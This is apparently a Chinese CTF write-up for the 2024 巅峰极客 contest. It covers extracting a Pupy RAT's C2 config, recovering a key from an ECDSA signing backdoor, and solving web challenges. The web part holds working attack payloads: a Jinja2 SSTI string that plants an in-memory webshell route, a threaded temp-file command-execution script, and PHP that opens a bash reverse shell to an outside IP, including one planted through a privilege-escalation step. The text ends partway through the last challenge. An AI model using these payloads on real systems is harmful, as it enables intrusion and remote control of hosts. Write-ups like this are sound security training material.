巅峰极客2024

misc

简历

题目描述:

本题灵感来源于真实*产样本，flag为c2 ip的md5值。例如ip为127.0.0.1，flag则为flag{f528764d624db129b32c21fbca0cb8d6}

下载附件

exe文件，首先拿到先查壳

upx -d 去壳

foremost分离1.exe

zsteg一把梭

下载default.a文件

010查看文件

发现大量yyttddd，猜测是异或XOR，赛博厨子一把梭

保存mz可执行文件到本地，放进云沙箱分析

Patpoopy木马

Block Pupy aka Patpoopy malware · Issue #110 · chartingshow/crypto-firewall

找到对应解木马内容的脚本

https://github.com/CaledoniaProject/pupyrat-config-decoder)%EF%BC%9A

exp:

import pylzma
import marshal

def decode_pupyrat(filename):
	data = None
	with open(filename, 'rb') as f:
		data = f.read()

	index = data.find(b'\x5d\x00\x00\x80\x00\x00')
	if  not index:
		print("LZMA signature not found, skipped")
		return
	
	data = pylzma.decompress(data[index:])
	tmp  = marshal.loads(data)
	print (tmp)
	
decode_pupyrat("download.exe")

python2运行得到

ip为

60.177.118.44

进行md5加密

最后flag为

flag{b57758d5acc923137eef453239ba685b}

crypto

backdoorplus

题目描述:

密码学也有后门吗

下载附件

from ecdsa.ecdsa import *
from Crypto.Util.number import *
import hashlib
import gmpy2

def inverse_mod(a, m):
    if a == 0:
        return 0
    return gmpy2.powmod(a, -1, m)

def bit_length(x):
    return x.bit_length()

def get_malicious_key():
    a = getRandomNBitInteger(20)
    b = getRandomNBitInteger(21)
    w = getRandomNBitInteger(30)
    X = getRandomNBitInteger(25)
    return a, b, w, X

class RSZeroError(RuntimeError):
    pass


class InvalidPointError(RuntimeError):
    pass


class Signature(object):
    """ECDSA signature."""

    def __init__(self, r, s):
        self.r = r
        self.s = s


class Public_key(object):
    """Public key for ECDSA."""

    def __init__(self, generator, point, verify=True):

        self.curve = generator.curve()
        self.generator = generator
        self.point = point
        n = generator.order()
        p = self.curve.p()
        if not (0 <= point.x() < p) or not (0 <= point.y() < p):
            raise InvalidPointError(
                "The public point has x or y out of range."
            )
        if verify and not self.curve.contains_point(point.x(), point.y()):
            raise InvalidPointError("Point does not lay on the curve")
        if not n:
            raise InvalidPointError("Generator point must have order.")

        if (
            verify
            and self.curve.cofactor() != 1
            and not n * point == ellipticcurve.INFINITY
        ):
            raise InvalidPointError("Generator point order is bad.")


class Private_key(object):
    """Private key for ECDSA."""

    def __init__(self, public_key, secret_multiplier):

        self.public_key = public_key
        self.secret_multiplier = secret_multiplier

    def sign(self, hash, random_k):

        G = self.public_key.generator
        n = G.order()
        k = random_k % n
        p1 = k * G
        r = p1.x() % n
        if r == 0:
            raise RSZeroError("amazingly unlucky random number r")
        s = (
            inverse_mod(k, n)
            * (hash + (self.secret_multiplier * r) % n)
        ) % n
        if s == 0:
            raise RSZeroError("amazingly unlucky random number s")
        return Signature(r, s)

    def malicious_sign(self,hash, random_k, a, b, w, X):
        # t = random.randint(0,1)
        t = 1
        G = self.public_key.generator
        Y = X * G
        n = G.order()
        k1 = random_k
        z = (k1 - w * t) * G + (-a * k1 - b) * Y
        zx = z.x() % n
        k2 = int(hashlib.sha1(str(zx).encode()).hexdigest(), 16)
        #print(f'k2 = {k2}')
        p1 = k2 * G
        r = p1.x() % n
        if r == 0:
            raise RSZeroError("amazingly unlucky random number r")
        s = (
                    inverse_mod(k2, n)
                    * (hash + (self.secret_multiplier * r) % n)
            ) % n
        if s == 0:
            raise RSZeroError("amazingly unlucky random number s")
        return (Signature(r, s),k2)

if __name__ == '__main__':
    a,b,w,X = get_malicious_key()
   
    message1 = b'It sounds as though you were lamenting,'
    message2 = b'a butterfly cooing like a dove.'
    hash_message1 = int(hashlib.sha1(message1).hexdigest(), 16)
    hash_message2 = int(hashlib.sha1(message2).hexdigest(), 16)
    private = getRandomNBitInteger(50)
    rand = getRandomNBitInteger(49)
    public_key = Public_key(generator_192, generator_192 * private)
    private_key = Private_key(public_key, private)
    sig = private_key.sign(hash_message1, rand)
    malicious_sig,k2 = private_key.malicious_sign(hash_message2, rand, a,b,w,X)
    
    print(a,b,w,X)
    print(sig.r)
    print(malicious_sig.r)

    '''
    751818 1155982 908970521 20391992
    6052579169727414254054653383715281797417510994285530927615
    3839784391338849056467977882403235863760503590134852141664
    '''
    
    # flag为flag{uuid}格式
    flag = b''
    m = bytes_to_long(flag)
    p = k2
    for i in range(99):
        p = gmpy2.next_prime(p)
    q = gmpy2.next_prime(p)
    e = 65537
    c = pow(m,e,p*q)
    print(c)
    # 1294716523385880392710224476578009870292343123062352402869702505110652244504101007338338248714943

exp：

from sage.all import*
from ecdsa import *
from Crypto.Util.number import *
import gmpy2 
import hashlib

a = 751818
b = 1155982
w = 908970521
x = 20391992
sig_r = 6052579169727414254054653383715281797417510994285530927615
c = 1294716523385880392710224476578009870292343123062352402869702505110652244504101007338338248714943
e = 65537
p = generator_192.curve().p()
E_a = generator_192.curve().a()
E_b = generator_192.curve().b()
E = EllipticCurve(GF(p),[E_a,E_b])
G = E([generator_192.x(), generator_192.y()])
k1G = E.lift_x(sig_r)
z = k1G - w*G - a*x*k1G -b*x*G
n = G.order()
zx = int(z[0]) % n
k2 = int(hashlib.sha1(str(zx).encode()).hexdigest(), 16)

p = k2
for i in range(99):
    p = gmpy2.next_prime(p)
q = gmpy2.next_prime(p)
n = p * q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m=int(pow(c,d,n))
# print(long_to_bytes(m))
for i in trange(99999):
    m += n
    if b'flag' in long_to_bytes(m):
        print(long_to_bytes(m))
#flag{0c75afae-f8ad-4df1-b2d9-a9ca348cb226}

web

EncirclingGame

题目描述:

A simple game, enjoy it and get the flag when you complete it.

开启环境

前端小游戏，围住病毒获得胜利，得到flag

不玩游戏的做法:

参考

2024 第七届“巅峰极客”网络安全技能挑战赛初赛 Web方向 题解WirteUp_2024极客大挑战-CSDN博客

抓包

POST /verifyVictory.php HTTP/1.1
Host: node4.anna.nssctf.cn:28964
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node4.anna.nssctf.cn:28964/
Content-Type: application/json
Content-Length: 438
Origin: http://node4.anna.nssctf.cn:28964
Connection: close
Priority: u=0

{"gameState":{"virusPosition":{"x":8,"y":6},"firewalls":[{"x":10,"y":5},{"x":2,"y":1},{"x":2,"y":9},{"x":8,"y":4},{"x":7,"y":9},{"x":3,"y":5},{"x":8,"y":2},{"x":5,"y":4},{"x":5,"y":7},{"x":6,"y":7},{"x":7,"y":7},{"x":9,"y":7},{"x":10,"y":6},{"x":10,"y":4},{"x":10,"y":3},{"x":9,"y":2},{"x":7,"y":2},{"x":6,"y":3},{"x":6,"y":4},{"x":7,"y":6},{"x":7,"y":5},{"x":8,"y":7},{"x":8,"y":5},{"x":9,"y":5},{"x":9,"y":6}]},"token":"game-lab-token"}

伪造黑点一圈包围红点

payload:

路由：/verifyVictory.php


方法：POST
{"gameState":{"virusPosition":{"x":3,"y":3},"firewalls":[{"x":4,"y":3},{"x":2,"y":3},{"x":3,"y":2},{"x":3,"y":4}]},"token":"game-lab-token"}

得到flag

最后flag为

flag{0fde8a1d-711b-4006-877b-066bec1232fd}

GoldenHornKing

题目描述：

举一反三。

开启环境

源码

import os

import jinja2
import functools
import uvicorn
from fastapi import FastAPI
from fastapi.templating import Jinja2Templates
from anyio import fail_after, sleep

def timeout_after(timeout: int = 1):
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            with fail_after(timeout):
                return await func(*args, **kwargs)
        return wrapper
    return decorator

app = FastAPI()
access = False

_base_path = os.path.dirname(os.path.abspath(__file__))
t = Jinja2Templates(directory=_base_path)

@app.get("/")
@timeout_after(1)
async def index():
    return open(__file__, 'r').read()

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}").render({"app": app})
        access = True
    return "fight"

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)

/calc**路由下存在ssti注入漏洞，过滤了数字和%25(%的url编码)，同时无回显，在进行一次jinja2的模板渲染后access会被设置为True，意味着我们只能进行一次ssti操作，操作后无法继续进行注入

方法一:打python内存马

/calc?calc_req=config.__init__.__globals__['__builtins__']['exec']('app.add_api_route("/flag",lambda:__import__("os").popen("cat /flag").read());',{"app":app})

访问flag路由读取flag

最后flag为

flag{51eac1be3727a5869869071cf95d65ae}

admin_Test

题目描述:

某系统有一个后台管理系统，里面的系统可以帮助管理员更好的管理系统并且防护来自于黑客的攻击，但仍存在漏洞，请尝试读取到系统当中的flag文件。

开启环境

扫一下敏感目录

/admin.html
/upload.php

访问/admin.html

一个文件上传功能和一个命令输入框

fuzz过滤

exp:

import requests

url="http://49.232.142.230:16561/upload.php"

def test():
    for i in range(32,128):
        if len(requests.post(url,files={"file": ("x","11111")}, data={"cmd": f"{chr(i)}"}).text) != 57:
            print(chr(i))
test()

运行得到

临时文件命令执行

exp:

import threading, requests

url = "http://49.232.142.230:16561/upload.php"

def getflag():
    while True:
        print(requests.post(url,files={"file": ("m",'find / -name "flag" -exec cat {} \;')}, data={"cmd": f". /t*/*"}).text)

for i in range(5):
    threading.Thread(target=getflag).start()
getflag()

运行得到

最后flag为

flag{0c04b1eeba9fbc4622694f87abf81d7f}

php_online

开启环境

输入yiqing12

反弹shell

<?php
system('bash -c "bash -i >& /dev/tcp/156.238.233.48/6666 0>&1"');

普通用户发现没有flag

/sandbox/{user_id}有权限，提权

<?php
system('rm init.py;mkdir init.py;chmod 777 init.py;ls init.py/');
file_put_contents("init.py/__main__.py","import os\nos.system('bash -c \"bash -i >& /dev/tcp/156.238.233.48/6666 0>&1\"')");